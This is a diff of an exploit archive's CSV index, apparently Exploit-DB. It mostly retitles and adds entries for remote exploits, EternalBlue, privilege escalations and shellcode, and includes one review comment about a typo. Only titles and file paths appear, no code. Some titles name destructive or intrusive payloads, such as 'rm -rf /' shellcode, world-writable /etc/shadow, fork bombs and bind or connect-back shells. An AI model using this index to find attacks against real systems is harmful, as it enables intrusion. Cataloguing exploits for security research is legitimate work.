Groupwise Messenger 2.0 Client - Buffer Overflow",2008-07-02,"Francisco Amato",novell,dos,0 31899,platforms/windows/dos/31899.txt,"VideoLAN VLC Media Player 2.1.3 - '.avs' Crash (PoC)",2014-02-25,kw4,windows,dos,0 31914,platforms/windows/dos/31914.pl,"Gold MP4 Player 3.3 - Buffer Overflow (PoC) (SEH)",2014-02-26,"Gabor Seljan",windows,dos,0 
@@ -4285,7 +4285,7 @@ id,file,description,date,author,platform,type,port 40097,platforms/multiple/dos/40097.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (3)",2016-07-13,COSIG,multiple,dos,0 40098,platforms/multiple/dos/40098.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (4)",2016-07-13,COSIG,multiple,dos,0 34102,platforms/linux/dos/34102.py,"ACME micro_httpd - Denial of Service",2014-07-18,"Yuval tisf Nativ",linux,dos,80 -33965,platforms/linux/dos/33965.txt,"Geo++ GNCASTER 1.4.0.7 - HTTP GET Request Denial of Service",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0 +33965,platforms/linux/dos/33965.txt,"Geo++ GNCASTER 1.4.0.7 - GET Request Denial of Service",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0 33966,platforms/linux/dos/33966.rb,"Geo++ GNCASTER 1.4.0.7 NMEA-data - Denial of Service",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0 33968,platforms/windows/dos/33968.pl,"Xitami 5.0 - '/AUX' Request Remote Denial of Service",2010-05-10,"Usman Saeed",windows,dos,0 33924,platforms/windows/dos/33924.py,"RealVNC 4.1.3 - 'ClientCutText' Message Remote Denial of Service",2010-05-02,"John Leitch",windows,dos,0 
@@ -4336,7 +4336,7 @@ id,file,description,date,author,platform,type,port 34364,platforms/linux/dos/34364.html,"Qt 4.6.3 - 'QTextEngine::LayoutData::reallocate()' Memory Corruption",2010-07-13,D4rk357,linux,dos,0 34368,platforms/windows/dos/34368.c,"Mthree Development MP3 to WAV Decoder - '.mp3' Remote Buffer Overflow",2009-10-31,4m!n,windows,dos,0 34375,platforms/linux/dos/34375.txt,"sSMTP 2.62 - 'standardize()' Buffer Overflow",2010-07-26,"Brendan Boerner",linux,dos,0 -34394,platforms/hardware/dos/34394.pl,"D-Link WBR-2310 1.0.4 - HTTP GET Request Remote Buffer Overflow",2010-08-03,"Rodrigo Escobar",hardware,dos,0 +34394,platforms/hardware/dos/34394.pl,"D-Link WBR-2310 1.0.4 - GET Request Remote Buffer Overflow",2010-08-03,"Rodrigo Escobar",hardware,dos,0 34395,platforms/windows/dos/34395.pl,"PMSoftware Simple Web Server 2.1 - 'From:' Header Processing Remote Denial of Service",2010-08-03,"Rodrigo Escobar",windows,dos,0 34403,platforms/windows/dos/34403.pl,"Quick 'n Easy FTP Server 3.9.1 - USER Command Remote Buffer Overflow",2010-07-22,demonalex,windows,dos,0 34404,platforms/windows/dos/34404.pl,"K-Meleon 1.x - URI Handling Multiple Denial of Service Vulnerabilities",2010-08-04,Lostmon,windows,dos,0 
@@ -9131,6 +9131,7 @@ id,file,description,date,author,platform,type,port 42274,platforms/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0 42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86-64,local,0 42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' Local Privilege Escalation 'Stack Clash' Exploit",2017-06-28,"Qualys Corporation",lin_x86,local,0 +42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 
@@ -12597,9 +12598,9 @@ id,file,description,date,author,platform,type,port 21484,platforms/windows/remote/21484.c,"Yahoo! Messenger 5.0 - Call Center Buffer Overflow",2002-05-27,bob,windows,remote,0 21485,platforms/windows/remote/21485.txt,"Microsoft Windows 95/98/2000/NT 4.0 - WinHlp Item Buffer Overflow",2002-05-27,"Next Generation Security",windows,remote,0 21488,platforms/novell/remote/21488.txt,"Netscape Enterprise Web Server for Netware 4/5 5.0 - Information Disclosure",2002-05-29,Procheckup,novell,remote,0 -21490,platforms/multiple/remote/21490.txt,"Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Malformed Request Information Disclosure",2002-05-29,"Richard Brain",multiple,remote,0 +21490,platforms/multiple/remote/21490.txt,"Apache Tomcat 3.2.3/3.2.4 - 'Source.jsp' Information Disclosure",2002-05-29,"Richard Brain",multiple,remote,0 21491,platforms/multiple/remote/21491.txt,"Apache Tomcat 3.2.3/3.2.4 - Example Files Web Root Full Path Disclosure",2002-05-29,"Richard Brain",multiple,remote,0 -21492,platforms/multiple/remote/21492.txt,"Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Malformed Request Information Disclosure",2002-05-29,"Richard Brain",multiple,remote,0 +21492,platforms/multiple/remote/21492.txt,"Apache Tomcat 3.2.3/3.2.4 - 'RealPath.jsp' Information Disclosuree",2002-05-29,"Richard Brain",multiple,remote,0 21650,platforms/windows/remote/21650.txt,"Microsoft SQL Server 2000 - Database Consistency Checkers Buffer Overflow",2002-07-25,"Cesar Cerrudo",windows,remote,0 21510,platforms/windows/remote/21510.pl,"Microsoft Internet Explorer 5/6 / Microsoft ISA Server 2000 / Microsoft Proxy Server 2.0 Gopher Client - Buffer Overflow",2002-07-27,mat@monkey.org,windows,remote,0 21511,platforms/multiple/remote/21511.c,"Nullsoft SHOUTcast 1.8.9 - Remote Buffer Overflow",2002-06-04,eSDee,multiple,remote,0 
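Review bot: the '+' line for 21492 introduces a typo, "'RealPath.jsp' Information Disclosuree"; it should read "Information Disclosure", matching the 21490 'Source.jsp' line directly above it. The same misspelling appears in the commit message's list of new titles, so both need fixing before merge.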
@@ -12759,10 +12760,10 @@ id,file,description,date,author,platform,type,port 21940,platforms/windows/remote/21940.txt,"Microsoft Internet Explorer 5/6 - Unauthorized Document Object Model Access",2002-10-15,"GreyMagic Software",windows,remote,0 21942,platforms/multiple/remote/21942.java,"Ingenium Learning Management System 5.1/6.1 - Reversible Password Hash",2002-10-15,"Brian Enigma",multiple,remote,0 21944,platforms/hardware/remote/21944.pl,"Cisco CatOS 5.x/6.1/7.3/7.4 - CiscoView HTTP Server Buffer Overflow",2002-10-16,blackangels,hardware,remote,0 -21945,platforms/linux/remote/21945.pl,"PlanetDNS PlanetWeb 1.14 - Malformed Request Remote Buffer Overflow",2002-10-17,"securma massine",linux,remote,0 +21945,platforms/linux/remote/21945.pl,"PlanetDNS PlanetWeb 1.14 - Remote Buffer Overflow",2002-10-17,"securma massine",linux,remote,0 21947,platforms/unix/remote/21947.txt,"IBM Websphere Edge Server 3.6/4.0 - Cross-Site Scripting",2002-10-23,Rapid7,unix,remote,0 21948,platforms/unix/remote/21948.txt,"IBM Websphere Edge Server 3.69/4.0 - HTTP Header Injection",2002-10-23,Rapid7,unix,remote,0 -21955,platforms/windows/remote/21955.java,"AN HTTPD 1.38/1.39/1.40/1.41 - Malformed SOCKS4 Request Buffer Overflow",2002-10-21,Kanatoko,windows,remote,0 +21955,platforms/windows/remote/21955.java,"AN HTTPD 1.38/1.39/1.40/1.41 - SOCKS4 Request Buffer Overflow",2002-10-21,Kanatoko,windows,remote,0 21958,platforms/windows/remote/21958.txt,"AOL Instant Messenger 4.8.2790 - Local File Execution",2002-10-22,"Blud Clot",windows,remote,0 21959,platforms/windows/remote/21959.txt,"Microsoft Internet Explorer 5/6 - Cached Objects Zone Bypass",2002-10-22,"GreyMagic Software",windows,remote,0 21964,platforms/windows/remote/21964.txt,"SolarWinds TFTP Server Standard Edition 5.0.55 - Directory Traversal",2002-10-25,"Matthew Murphy",windows,remote,0 
@@ -13352,7 +13353,7 @@ id,file,description,date,author,platform,type,port 24120,platforms/linux/remote/24120.c,"LHA 1.x - Multiple extract_one Buffer Overflow Vulnerabilities",2004-05-19,"Lukasz Wojtow",linux,remote,0 24121,platforms/osx/remote/24121.txt,"Apple Mac OSX 10.3.x - Help Protocol Remote Code Execution",2004-05-17,"Troels Bay",osx,remote,0 24125,platforms/windows/remote/24125.txt,"Microsoft Windows XP - Self-Executing Folder",2004-05-17,"Roozbeh Afrasiabi",windows,remote,0 -24129,platforms/windows/remote/24129.bat,"Omnicron OmniHTTPd 2.x/3.0 - Get Request Buffer Overflow",2004-04-23,CoolICE,windows,remote,0 +24129,platforms/windows/remote/24129.bat,"Omnicron OmniHTTPd 2.x/3.0 - GET Request Buffer Overflow",2004-04-23,CoolICE,windows,remote,0 24133,platforms/windows/remote/24133.rb,"freeSSHd 1.2.6 - Authentication Bypass (Metasploit)",2013-01-15,Metasploit,windows,remote,0 24136,platforms/linux/remote/24136.txt,"KDE Konqueror 3.x - Embedded Image URI Obfuscation",2004-05-18,"Drew Copley",linux,remote,0 24137,platforms/multiple/remote/24137.txt,"Netscape Navigator 7.1 - Embedded Image URI Obfuscation",2004-05-19,"Lyndon Durham",multiple,remote,0 
@@ -13704,7 +13705,7 @@ id,file,description,date,author,platform,type,port 25835,platforms/windows/remote/25835.html,"Logic Print 2013 - Stack Overflow (vTable Overwrite)",2013-05-30,h1ch4m,windows,remote,0 25836,platforms/windows/remote/25836.py,"Intrasrv Simple Web Server 1.0 - Remote Code Execution (SEH)",2013-05-30,xis_one,windows,remote,0 25841,platforms/windows/remote/25841.txt,"Yaws 1.5x - Source Code Disclosure",2005-06-17,"Daniel Fabian",windows,remote,0 -25842,platforms/multiple/remote/25842.txt,"JBoss 3.x/4.0.2 - Malformed HTTP Request Remote Information Disclosure",2005-06-17,"Marc Schoenefeld",multiple,remote,0 +25842,platforms/multiple/remote/25842.txt,"JBoss 3.x/4.0.2 - HTTP Request Remote Information Disclosure",2005-06-17,"Marc Schoenefeld",multiple,remote,0 25851,platforms/windows/remote/25851.rb,"Lianja SQL 1.0.0RC5.1 - db_netserver Stack Buffer Overflow (Metasploit)",2013-05-31,Metasploit,windows,remote,8001 26288,platforms/linux/remote/26288.txt,"Mozilla Browser/Firefox - Arbitrary Command Execution",2005-09-20,"eter Zelezny",linux,remote,0 25948,platforms/windows/remote/25948.txt,"Novell NetMail 3.x - Automatic Script Execution",2005-07-06,shalom@venera.com,windows,remote,0 
@@ -15392,8 +15393,8 @@ id,file,description,date,author,platform,type,port 38982,platforms/jsp/remote/38982.rb,"ManageEngine Desktop Central 9 - FileUploadServlet ConnectionId (Metasploit)",2015-12-15,Metasploit,jsp,remote,8020 38983,platforms/java/remote/38983.rb,"Jenkins CLI - RMI Java Deserialization (Metasploit)",2015-12-15,Metasploit,java,remote,8080 39007,platforms/java/remote/39007.txt,"FireEye - Wormable Remote Code Execution in MIP JAR Analysis",2015-12-16,"Tavis Ormandy and Natalie Silvanovich",java,remote,0 -39008,platforms/windows/remote/39008.py,"Easy File Sharing Web Server 7.2 - GET HTTP Request Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80 -39009,platforms/windows/remote/39009.py,"Easy File Sharing Web Server 7.2 - HEAD HTTP Request Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80 +39008,platforms/windows/remote/39008.py,"Easy File Sharing Web Server 7.2 - GET Request Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80 +39009,platforms/windows/remote/39009.py,"Easy File Sharing Web Server 7.2 - HEAD Request Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80 39018,platforms/multiple/remote/39018.txt,"Oracle Supply Chain Products Suite - Remote Security",2014-01-14,Oracle,multiple,remote,0 39074,platforms/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/diagnostic.cgi' 'ping_ipaddr' Parameter Remote Code Execution",2014-02-03,"Josue Rojas",cgi,remote,0 39105,platforms/windows/remote/39105.py,"VideoCharge Studio - 'CHTTPResponse::GetHttpResponse()' Function Stack Buffer Overflow",2014-02-19,"Julien Ahrens",windows,remote,0 
@@ -15620,7 +15621,7 @@ id,file,description,date,author,platform,type,port 41694,platforms/multiple/remote/41694.rb,"SSH - User Code Execution (Metasploit)",1999-01-01,Metasploit,multiple,remote,0 41695,platforms/linux/remote/41695.rb,"Redmine SCM Repository - Arbitrary Command Execution (Metasploit)",2010-12-19,Metasploit,linux,remote,0 41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0 -42261,platforms/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET HTTP Request 'PassWD' Buffer Overflow (SEH)",2017-06-27,clubjk,windows,remote,80 +42261,platforms/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (SEH)",2017-06-27,clubjk,windows,remote,80 42256,platforms/windows/remote/42256.rb,"Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit)",2017-06-17,Metasploit,windows,remote,80 41987,platforms/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0 42287,platforms/android/remote/42287.txt,"eVestigator Forensic PenTester - MITM Remote Code Execution",2017-06-30,intern0t,android,remote,0 
@@ -15656,7 +15657,7 @@ id,file,description,date,author,platform,type,port 41996,platforms/php/remote/41996.sh,"Vanilla Forums < 2.3 - Remote Code Execution",2017-05-11,"Dawid Golunski",php,remote,0 42010,platforms/linux/remote/42010.rb,"Quest Privilege Manager - pmmasterd Buffer Overflow (Metasploit)",2017-05-15,Metasploit,linux,remote,0 42011,platforms/windows/remote/42011.py,"LabF nfsAxe 3.7 FTP Client - Buffer Overflow (SEH)",2017-05-15,Tulpa,windows,remote,0 -42030,platforms/win_x86-64/remote/42030.py,"Microsoft Windows Windows 8/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,win_x86-64,remote,445 +42030,platforms/win_x86-64/remote/42030.py,"Microsoft Windows Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,win_x86-64,remote,445 42022,platforms/windows/remote/42022.rb,"Dup Scout Enterprise 9.5.14 - GET Buffer Overflow (Metasploit)",2017-05-17,Metasploit,windows,remote,0 42023,platforms/windows/remote/42023.rb,"Serviio Media Server - checkStreamUrl Command Execution (Metasploit)",2017-05-17,Metasploit,windows,remote,23423 42024,platforms/php/remote/42024.rb,"WordPress PHPMailer 4.6 - Host Header Command Injection (Metasploit)",2017-05-17,Metasploit,php,remote,0 
@@ -15689,8 +15690,8 @@ id,file,description,date,author,platform,type,port 42296,platforms/unix/remote/42296.rb,"GoAutoDial 3.3 - Authentication Bypass / Command Injection (Metasploit)",2017-07-05,Metasploit,unix,remote,443 42297,platforms/php/remote/42297.py,"Lepide Auditor Suite - 'createdb()' Web Console Database Injection / Remote Code Execution",2017-07-05,mr_me,php,remote,7778 42303,platforms/multiple/remote/42303.txt,"Yaws 1.91 - Remote File Disclosure",2017-07-07,hyp3rlinx,multiple,remote,0 -42304,platforms/windows/remote/42304.py,"Easy File Sharing Web Server 7.2 - GET HTTP Request 'PassWD' Buffer Overflow (DEP Bypass)",2017-07-08,"Sungchul Park",windows,remote,0 -42306,platforms/linux/remote/42306.txt,"NfSen <= 1.3.7 / AlienVault OSSIM 5.3.4 - Command Injection",2017-07-10,"Paul Taylor",linux,remote,0 +42304,platforms/windows/remote/42304.py,"Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (DEP Bypass)",2017-07-08,"Sungchul Park",windows,remote,0 +42315,platforms/windows/remote/42315.py,"Microsoft Windows Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-07-11,sleepya,windows,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 
@@ -15736,14 +15737,14 @@ id,file,description,date,author,platform,type,port 13284,platforms/generator/shellcode/13284.txt,"(Generator) - /bin/sh Polymorphic With Printable ASCII Characters Shellcode",2008-08-31,sorrow,generator,shellcode,0 13285,platforms/generator/shellcode/13285.c,"Linux/x86 - cmd Null-Free Shellcode (Generator)",2008-08-19,BlackLight,generator,shellcode,0 13286,platforms/generator/shellcode/13286.c,"(Generator) - Alphanumeric Shellcode (Encoder/Decoder)",2008-08-04,"Avri Schneider",generator,shellcode,0 -13288,platforms/generator/shellcode/13288.c,"(Generator) - HTTP/1.x requests Shellcode (18+ bytes / 26+ bytes)",2006-10-22,izik,generator,shellcode,0 +13288,platforms/generator/shellcode/13288.c,"(Generator) - HTTP/1.x Requests Shellcode (18+ bytes / 26+ bytes)",2006-10-22,izik,generator,shellcode,0 13289,platforms/generator/shellcode/13289.c,"Win32 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,generator,shellcode,0 13290,platforms/ios/shellcode/13290.txt,"iOS - Version-independent Shellcode",2008-08-21,"Andy Davis",ios,shellcode,0 13291,platforms/hardware/shellcode/13291.txt,"Cisco IOS - Connectback Port 21 Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 13292,platforms/hardware/shellcode/13292.txt,"Cisco IOS - Bind Password Protected Shellcode (116 bytes)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 13293,platforms/hardware/shellcode/13293.txt,"Cisco IOS - Tiny Shellcode (New TTY_ Privilege level to 15_ No password)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 13295,platforms/hp-ux/shellcode/13295.txt,"HPUX - execve /bin/sh Shellcode (58 bytes)",2004-09-26,K2,hp-ux,shellcode,0 -13296,platforms/lin_x86-64/shellcode/13296.c,"Linux/x86-64 - flush iptables rules Shellcode (84 bytes)",2008-11-28,gat3way,lin_x86-64,shellcode,0 +13296,platforms/lin_x86-64/shellcode/13296.c,"Linux/x86-64 - Flush IPTables Rules Shellcode (84 bytes)",2008-11-28,gat3way,lin_x86-64,shellcode,0 
13297,platforms/lin_x86-64/shellcode/13297.c,"Linux/x86-64 - Connect Back Semi-Stealth Shellcode (88+ bytes)",2006-04-21,phar,lin_x86-64,shellcode,0 13298,platforms/linux_mips/shellcode/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind 4919/TCP Shellcode (276 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0 13299,platforms/linux_mips/shellcode/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve Shellcode (60 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0 @@ -15754,7 +15755,7 @@ id,file,description,date,author,platform,type,port 13304,platforms/linux_ppc/shellcode/13304.c,"Linux/PPC - execve /bin/sh Shellcode (112 bytes)",2004-09-12,Palante,linux_ppc,shellcode,0 13305,platforms/linux_sparc/shellcode/13305.c,"Linux/SPARC - connect back (192.168.100.1:2313) Shellcode (216 bytes)",2004-09-26,killah,linux_sparc,shellcode,0 13306,platforms/linux_sparc/shellcode/13306.c,"Linux/SPARC - Bind 8975/TCP Shellcode (284 bytes)",2004-09-12,killah,linux_sparc,shellcode,0 -13307,platforms/lin_x86/shellcode/13307.c,"Linux/x86 - Self-modifying for IDS evasion Shellcode (64 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0 +13307,platforms/lin_x86/shellcode/13307.c,"Linux/x86 - Self-Modifying Anti-IDS Shellcode (64 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0 13308,platforms/lin_x86/shellcode/13308.c,"Linux/x86 - Forks a HTTP Server on 8800/TCP Shellcode (166 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0 13309,platforms/lin_x86/shellcode/13309.asm,"Linux/x86 - Listens on 5555/TCP + Jumps to it Shellcode (83 bytes)",2009-09-09,XenoMuta,lin_x86,shellcode,0 13310,platforms/lin_x86/shellcode/13310.c,"Linux/x86 - Disable Network Card Polymorphic Shellcode (75 bytes)",2009-08-26,"Jonathan Salwan",lin_x86,shellcode,0 
@@ -15765,13 +15766,13 @@ id,file,description,date,author,platform,type,port 13315,platforms/lin_x86/shellcode/13315.c,"Linux/x86 - chmod(_/etc/shadow__666) Polymorphic Shellcode (54 bytes)",2009-06-22,"Jonathan Salwan",lin_x86,shellcode,0 13316,platforms/lin_x86/shellcode/13316.c,"Linux/x86 - setreuid(geteuid()_geteuid())_execve(_/bin/sh__0_0) Shellcode (34 bytes)",2009-06-16,blue9057,lin_x86,shellcode,0 13317,platforms/lin_x86/shellcode/13317.s,"Linux/x86 - Bind 8000/TCP + Execve Iptables -F Shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0 -13318,platforms/lin_x86/shellcode/13318.s,"Linux/x86 - Bind 8000/TCP + Add User with Root Access Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0 +13318,platforms/lin_x86/shellcode/13318.s,"Linux/x86 - Bind 8000/TCP + Add Root User Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0 13319,platforms/lin_x86/shellcode/13319.s,"Linux/x86 - Bind 8000/TCP ASM Code Linux Shellcode (179 bytes)",2009-06-01,"Jonathan Salwan",lin_x86,shellcode,0 13320,platforms/lin_x86-64/shellcode/13320.c,"Linux/x86-64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,lin_x86-64,shellcode,0 13321,platforms/lin_x86/shellcode/13321.c,"Linux/x86 - Serial port shell binding + busybox Launching Shellcode (82 bytes)",2009-04-30,phar,lin_x86,shellcode,0 -13322,platforms/lin_x86/shellcode/13322.c,"Linux/x86 - File unlinker Shellcode (18+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode,0 -13323,platforms/lin_x86/shellcode/13323.c,"Linux/x86 - Perl script execution Shellcode (99+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode,0 -13324,platforms/lin_x86/shellcode/13324.c,"Linux/x86 - file reader Shellcode (65+ bytes)",2009-02-27,certaindeath,lin_x86,shellcode,0 +13322,platforms/lin_x86/shellcode/13322.c,"Linux/x86 - File Unlinker Shellcode (18+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode,0 +13323,platforms/lin_x86/shellcode/13323.c,"Linux/x86 - Perl Script Execution 
Shellcode (99+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode,0 +13324,platforms/lin_x86/shellcode/13324.c,"Linux/x86 - File Reader Shellcode (65+ bytes)",2009-02-27,certaindeath,lin_x86,shellcode,0 13325,platforms/lin_x86/shellcode/13325.c,"Linux/x86 - chmod(_/etc/shadow__666) + exit(0) Shellcode (30 bytes)",2009-02-20,"Jonathan Salwan",lin_x86,shellcode,0 13326,platforms/lin_x86/shellcode/13326.c,"Linux/x86 - killall5 Shellcode (34 bytes)",2009-02-04,"Jonathan Salwan",lin_x86,shellcode,0 13327,platforms/lin_x86/shellcode/13327.c,"Linux/x86 - PUSH reboot() Shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",lin_x86,shellcode,0 @@ -15796,7 +15797,7 @@ id,file,description,date,author,platform,type,port 13346,platforms/lin_x86/shellcode/13346.s,"Linux/x86 - execve read Shellcode (92 bytes)",2006-11-20,0ut0fbound,lin_x86,shellcode,0 13347,platforms/lin_x86/shellcode/13347.c,"Linux/x86 - /sbin/ipchains -F Shellcode (40 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 13348,platforms/lin_x86/shellcode/13348.c,"Linux/x86 - Set System Time to 0 + exit Shellcode (12 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 -13349,platforms/lin_x86/shellcode/13349.c,"Linux/x86 - Add Root User 'r00t' Without Password To /etc/passwd Shellcode (69 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 +13349,platforms/lin_x86/shellcode/13349.c,"Linux/x86 - Add Root User (r00t) To /etc/passwd Shellcode (69 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 13350,platforms/lin_x86/shellcode/13350.c,"Linux/x86 - chmod 0666 /etc/shadow Shellcode (36 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 13351,platforms/lin_x86/shellcode/13351.c,"Linux/x86 - Fork Bomb Shellcode (7 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 13352,platforms/lin_x86/shellcode/13352.c,"Linux/x86 - execve(rm -rf /) Shellcode (45 bytes)",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 
@@ -15829,14 +15830,14 @@ id,file,description,date,author,platform,type,port 13379,platforms/lin_x86/shellcode/13379.c,"Linux/x86 - setreuid(0_0) execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (33 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 13380,platforms/lin_x86/shellcode/13380.c,"Linux/x86 - HTTP/1.x GET_ Downloads + JMP Shellcode (68+ bytes)",2006-03-12,izik,lin_x86,shellcode,0 13381,platforms/lin_x86/shellcode/13381.c,"Linux/x86 - TCP Proxy Shellcode (236 bytes)",2006-02-07,phar,lin_x86,shellcode,0 -13382,platforms/lin_x86/shellcode/13382.c,"Linux/x86 - execve /bin/sh anti-ids Shellcode (40 bytes)",2006-01-26,NicatiN,lin_x86,shellcode,0 +13382,platforms/lin_x86/shellcode/13382.c,"Linux/x86 - execve /bin/sh Anti-IDS Shellcode (40 bytes)",2006-01-26,NicatiN,lin_x86,shellcode,0 13383,platforms/lin_x86/shellcode/13383.c,"Linux/x86 - execve /bin/sh xored for Intel x86 CPUID Shellcode (41 bytes)",2006-01-25,izik,lin_x86,shellcode,0 13384,platforms/lin_x86/shellcode/13384.c,"Linux/x86 - execve /bin/sh Shellcode (+1 Encoded) (39 bytes)",2006-01-25,izik,lin_x86,shellcode,0 -13385,platforms/lin_x86/shellcode/13385.c,"Linux/x86 - Add User 'xtz' without Password to /etc/passwd Shellcode (59 bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13385,platforms/lin_x86/shellcode/13385.c,"Linux/x86 - Add User (xtz) To /etc/passwd Shellcode (59 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13386,platforms/lin_x86/shellcode/13386.c,"Linux/x86 - anti-debug trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13387,platforms/lin_x86/shellcode/13387.c,"Linux/x86 - Bind /bin/sh to 31337/TCP Shellcode (80 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13388,platforms/lin_x86/shellcode/13388.c,"Linux/x86 - Bind /bin/sh to 31337/TCP + fork() Shellcode (98 bytes)",2006-01-21,izik,lin_x86,shellcode,0 -13389,platforms/lin_x86/shellcode/13389.c,"Linux/x86 - 24/7 open cd-rom loop (follows /dev/cdrom symlink) Shellcode (39 
bytes)",2006-01-21,izik,lin_x86,shellcode,0 +13389,platforms/lin_x86/shellcode/13389.c,"Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13390,platforms/lin_x86/shellcode/13390.c,"Linux/x86 - eject cd-rom (follows /dev/cdrom symlink) + exit() Shellcode (40 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13391,platforms/lin_x86/shellcode/13391.c,"Linux/x86 - eject/close cd-rom loop (follows /dev/cdrom symlink) Shellcode (45 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13392,platforms/lin_x86/shellcode/13392.c,"Linux/x86 - chmod(/etc/shadow_ 0666) + exit() Shellcode (32 bytes)",2006-01-21,izik,lin_x86,shellcode,0 
